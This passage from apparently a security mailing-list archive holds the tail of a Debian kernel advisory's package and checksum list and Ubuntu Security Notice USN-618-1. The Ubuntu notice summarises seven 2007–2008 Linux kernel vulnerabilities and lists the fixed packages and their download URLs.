http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 178194 4baf9d4d2fed0b5e3f12add06fae014b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 3350066 4938243e89da8ace26c47d00bc60acf1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 182706 84024a93ebcd9d394f179c8ee254ef1b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 15053292 024f0d5e1fbaf5c7d5664aca87ac8741 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 54102 d25d6e1de865a3da93959dd8f8034d7f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 6027404 26b3c01fd8f1c798189c1ee5ec44d11c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 15030096 69c0f1d1c25f49c3201a0b3edc1873b0

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 16402406 7f918a1714d84f8ccb6aaf1a13fc518e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 17016786 c06998d5b9b3c192bde5ecc4119830a1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 54088 3683bf42ff1af3009202bf4c6a0e30cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 16626352 37c3c60edcd7f7b22ededfcda073b5a8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 251358 20ade66e354f4473ff045bb0e4e2f7c5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 229986 a6996ddd8cd1f5439aecfc4693ab83f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 54036 d451146b15c05d5d630f72a3399a3464 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 253356 69fd6bca694ce1aea2788658eb530d3e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 18348404 6899ee7990a534276f4c98970a05a843 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 3414514 54cad7ae1cd248f0125aa12c9823f0c7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 18293832 2025add962d50482de362ee202f8bb79 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 252806 ed8f3ba9ab6384096d25204af0594ed1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 3392288 02cba07fa4ab35192737f7a40907cf53 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 16969082 d986973f5c4d0e577b169c96ffa0cec4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 15157518 c3ae440ddcd66b9aaa80260824f91967 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 253230 4d2e3ce370d0c3caf798cfee0dfc44d2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 246254 fa91c1654d4f46128856838066eb11bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb Size/MD5 checksum: 252272 5eda39b6177f4e66f082c06a159f5719

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 54058 9e8a26d5500ffcd7a6a29dfac6d570b8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 54032 350d6fe5dcfdefcc6f92e364f0ffba3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 5401990 4af4cf18cb011bb00bb882f7a03c9a21 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 143264 76db142c20b22a4d0847f6309e0a10da http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 2966014 81cfb914839c4709399e25ffe9eb2cb5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 143688 4291bc7d9865c2842a181b22a7992188 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 5661534 8f7661bfe58017b2e3aa2eb9ca3ffadd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 1438796 18d9f041343153cf48f441eeed112885 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 5619704 7213d869d6e23933ae5e55c87fade8f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 144632 5df45b01064fc7de2106e8b532946cb5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_s390.deb Size/MD5 checksum: 2942938 7dcac05e6588849c7491ef1004759f39

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 3168126 ef5277a44be4e2fb95d7f7feca1cc568 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 165126 8d82f98016c375c250105791051e3021 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 6411270 7106725061d98e4036d0ebabd01ca7fa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 195102 73419b6d64a68410924a0471f0d3bf62 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 10391364 f35ec6950afc88b69fa814d005b68550 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 54046 dbd49273f393e72c21f056d50f94cf02 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 3190444 40bc9af5142779024dea09675f833778 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 194260 80fdc90e470899b21ae831aaa06702b9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 195828 2036f355f29c418602074540bde81c65 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 10693152 7bef279c0e967019fa5e8a07c1eb4019 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 10647534 197798f662b6e4fc55d0f64dcea6eeff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch3_sparc.deb Size/MD5 checksum: 54076 8a2d9ac2067a4c8a7b090da06faf4025

These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFIGgmwhuANDBmkLRkRAoRpAKCCo/Ja0CkmHW8VQijCHN7Y5l113ACeKR48 1gWjfQ6MRn5jOphirPT8DZg= =22DK -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-618-1 June 19, 2008 linux-source-2.6.15/20/22 vulnerabilities CVE-2007-4571, CVE-2007-5904, CVE-2007-6694, CVE-2008-0007, CVE-2008-1294, CVE-2008-1375, CVE-2008-1669 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-52-386 2.6.15-52.67 linux-image-2.6.15-52-686 2.6.15-52.67 linux-image-2.6.15-52-amd64-generic 2.6.15-52.67 linux-image-2.6.15-52-amd64-k8 2.6.15-52.67 linux-image-2.6.15-52-amd64-server 2.6.15-52.67 linux-image-2.6.15-52-amd64-xeon 2.6.15-52.67 linux-image-2.6.15-52-hppa32 2.6.15-52.67 linux-image-2.6.15-52-hppa32-smp 2.6.15-52.67 linux-image-2.6.15-52-hppa64 2.6.15-52.67 linux-image-2.6.15-52-hppa64-smp 2.6.15-52.67 linux-image-2.6.15-52-itanium 2.6.15-52.67 linux-image-2.6.15-52-itanium-smp 2.6.15-52.67 linux-image-2.6.15-52-k7 2.6.15-52.67 linux-image-2.6.15-52-mckinley 2.6.15-52.67 linux-image-2.6.15-52-mckinley-smp 2.6.15-52.67 linux-image-2.6.15-52-powerpc 2.6.15-52.67 linux-image-2.6.15-52-powerpc-smp 2.6.15-52.67 linux-image-2.6.15-52-powerpc64-smp 2.6.15-52.67 linux-image-2.6.15-52-server 2.6.15-52.67 linux-image-2.6.15-52-server-bigiron 2.6.15-52.67 linux-image-2.6.15-52-sparc64 2.6.15-52.67 linux-image-2.6.15-52-sparc64-smp 2.6.15-52.67

Ubuntu 7.04: linux-image-2.6.20-17-386 2.6.20-17.36 linux-image-2.6.20-17-generic 2.6.20-17.36 linux-image-2.6.20-17-hppa32 2.6.20-17.36 linux-image-2.6.20-17-hppa64 2.6.20-17.36 linux-image-2.6.20-17-itanium 2.6.20-17.36 linux-image-2.6.20-17-lowlatency 2.6.20-17.36 linux-image-2.6.20-17-mckinley 2.6.20-17.36 linux-image-2.6.20-17-powerpc 2.6.20-17.36 linux-image-2.6.20-17-powerpc-smp 2.6.20-17.36 linux-image-2.6.20-17-powerpc64-smp 2.6.20-17.36 linux-image-2.6.20-17-server 2.6.20-17.36 linux-image-2.6.20-17-server-bigiron 2.6.20-17.36 linux-image-2.6.20-17-sparc64 2.6.20-17.36 linux-image-2.6.20-17-sparc64-smp 2.6.20-17.36

Ubuntu 7.10: linux-image-2.6.22-15-386 2.6.22-15.54 linux-image-2.6.22-15-cell 2.6.22-15.54 linux-image-2.6.22-15-generic 2.6.22-15.54 linux-image-2.6.22-15-hppa32 2.6.22-15.54 linux-image-2.6.22-15-hppa64 2.6.22-15.54 linux-image-2.6.22-15-itanium 2.6.22-15.54 linux-image-2.6.22-15-lpia 2.6.22-15.54 linux-image-2.6.22-15-lpiacompat 2.6.22-15.54 linux-image-2.6.22-15-mckinley 2.6.22-15.54 linux-image-2.6.22-15-powerpc 2.6.22-15.54 linux-image-2.6.22-15-powerpc-smp 2.6.22-15.54 linux-image-2.6.22-15-powerpc64-smp 2.6.22-15.54 linux-image-2.6.22-15-rt 2.6.22-15.54 linux-image-2.6.22-15-server 2.6.22-15.54 linux-image-2.6.22-15-sparc64 2.6.22-15.54 linux-image-2.6.22-15-sparc64-smp 2.6.22-15.54 linux-image-2.6.22-15-ume 2.6.22-15.54 linux-image-2.6.22-15-virtual 2.6.22-15.54 linux-image-2.6.22-15-xen 2.6.22-15.54

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-386, linux-powerpc, linux-amd64-generic), a standard system upgrade will automatically perform this as well.

Details follow:

It was discovered that the ALSA /proc interface did not write the correct number of bytes when reporting memory allocations. A local attacker might be able to access sensitive kernel memory, leading to a loss of privacy. (CVE-2007-4571)

Multiple buffer overflows were discovered in the handling of CIFS filesystems. A malicious CIFS server could cause a client system crash or possibly execute arbitrary code with kernel privileges. (CVE-2007-5904)

It was discovered that PowerPC kernels did not correctly handle reporting certain system details. By requesting a specific set of information, a local attacker could cause a system crash resulting in a denial of service. (CVE-2007-6694)

It was discovered that some device driver fault handlers did not correctly verify memory ranges. A local attacker could exploit this to access sensitive kernel memory, possibly leading to a loss of privacy. (CVE-2008-0007)

It was discovered that CPU resource limits could be bypassed. A malicious local user could exploit this to avoid administratively imposed resource limits. (CVE-2008-1294)

A race condition was discovered between dnotify fcntl() and close() in the kernel. If a local attacker performed malicious dnotify requests, they could cause memory consumption leading to a denial of service, or possibly send arbitrary signals to any process. (CVE-2008-1375)

On SMP systems, a race condition existed in fcntl(). Local attackers could perform malicious locks, causing system crashes and leading to a denial of service. (CVE-2008-1669)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-52.10.dsc
  Size/MD5:     2611 f3dd319890b9704ecc00045636534db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-52.10.tar.gz
  Size/MD5:   446767 c94e2a00ecf18fce9dd031ac6e9cd052
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67.diff.gz
  Size/MD5:  2873504 d7723bb11612357b4608e8f60e4b8418
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67.dsc
  Size/MD5:     2374 45557a3d6035adbdd6ed5305b0833105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-52.3.diff.gz
  Size/MD5:    95993 a73703b2df5faf419f59a512078613a2
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-52.3.dsc
  Size/MD5:     3194 c10a6c6c95b0be5c93d4681f2a5759b8
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12.orig.tar.gz
  Size/MD5: 97745908 fb5765cfa2b0fdb06deb54fd6e537772

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-52.67_all.deb
  Size/MD5:  5162896 72f6b6c423959afebb74c6a804c0f388
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-52.67_all.deb
  Size/MD5:    92962 51e59e2666145a31fb4ac47c3d4ab61e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67_all.deb
  Size/MD5: 44740314 06fa6b3c9496839b240aa285a9f85e26
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-common_2.6.15.12-52.3_all.deb
  Size/MD5:    18452 37a5059b2b5efaa59c7e688a6003c732

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-generic_2.6.15-52.10_amd64.deb
  Size/MD5:   165150 0a73a8b05abfc08043f9e308459a3a9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-k8_2.6.15-52.10_amd64.deb
  Size/MD5:   165240 50c208a7c25cdf1b13c4edc5703e23b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-server_2.6.15-52.10_amd64.deb
  Size/MD5:   165290 61dc26e3f218600402384d3dd495d6b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-xeon_2.6.15-52.10_amd64.deb
  Size/MD5:   156050 7a9506a56279a9e2f053c931a91cf5d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb
  Size/MD5:    84706 763f0c324d411c838e179af730f45d67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb
  Size/MD5:    97394 0117222de0bf93e1a89af25d628d6c16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    22342 72e3223d194781df52d35571f6325760
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    44764 43dcd9724184cf62e5f9cab54afe1e13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:     2304 4e9ebca859508d6c5464ff9f06e57ade
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    36244 5aaf7d1dbe903fbeeddf3ecfc8901128
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   102284 5065464eff55e17f28a35f5e57a842bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    38874 e26b198e7cc4a18f5797df9f44dd91dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    49134 4a80334564469d8118821235792f9bef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   176690 9aacdae559d3bc97a2640ce4d58da0f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    36768 8cffcbc067254877445e6105396a5f16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   142248 4c44b18a12bf86917275670a71cd3720
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    51040 79823112f8894465b411b91357582252
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   140606 d94e572bb96c18f35c3b536042d34a24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   286872 653ea1a2020706629e7a4ec2abe489d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    97788 6c0387e7d1b0f25d0335a4471931e0be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:  1650922 76ec5ee75959713b6a6b1cb18c14d646
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-generic_2.6.15-52.67_amd64.deb
  Size/MD5:   865032 d6c05bd69946a41ff5973f94ff122aa8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-k8_2.6.15-52.67_amd64.deb
  Size/MD5:   869106 ac69148ec23b3387116044527ae22eaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb
  Size/MD5:   870098 07f513158e47bc6a167d5e535dc0162a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-xeon_2.6.15-52.67_amd64.deb
  Size/MD5:   869108 ff2a239414471590ab6be64c50de8bf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_amd64.deb
  Size/MD5:  6921780 5fd6888d0cee59933c68eb44aa2c7a73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-generic_2.6.15-52.67_amd64.deb
  Size/MD5: 20809038 6d59f0d3dfa5f99df35be979b1405a89
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-k8_2.6.15-52.67_amd64.deb
  Size/MD5: 20780064 160dc131a43e31bc0ac8901ca74985b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb
  Size/MD5: 21629596 4069011a19bc0bbf68365146ae33c0aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-xeon_2.6.15-52.67_amd64.deb
  Size/MD5: 19896776 39907bab9abcf29f0bf969d3d402ed0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    15622 6978c2690730ec2f561763ef5122bcb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   240352 2ddb4ac8cf58569791230da89a30a9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   202552 147e6b2684c8db670776a7e168ba0512
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:  1048600 5da9db1b27e8954ee79eb80c41eec163
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:  1543100 7ae3da3261b08b812d68021e9797f8af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   161644 8a3bcf8f7850a714858ed668ef5b3976
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:     9828 860022b69a682ef0bfa92249055e6e8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    80852 1b447c6d6339da87350b44bf223c7d93
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    49164 2d90f509d7d5ade4b623bc82ac3bea22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    35158 077981a17ebfe2bbefa3660f208f43b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    70856 4c4c628331820d9ded9e2f8e00ff0ec2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:     6216 2652727a590c6e7248d3be4b2e0f838c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:     9058 92df3c6ba60457acd1f602696df3aac6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    57874 71fc227183b138479093e72d2dd964c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   123330 19a834fb4cff1ac35b96eb6eec3fa5a6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   101000 e595f2e9f9997f83b7658f0bd7138272
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    79230 59fb1d8c41d9ecaa1c483981dff8c31c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:  1594716 2df0dbbe97e5c709125495de80a31c3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    72278 aeda6dfe658cec5ad60f9580f1c02141
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    12646 612cd82d3c221c2494a95b10a75f03b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
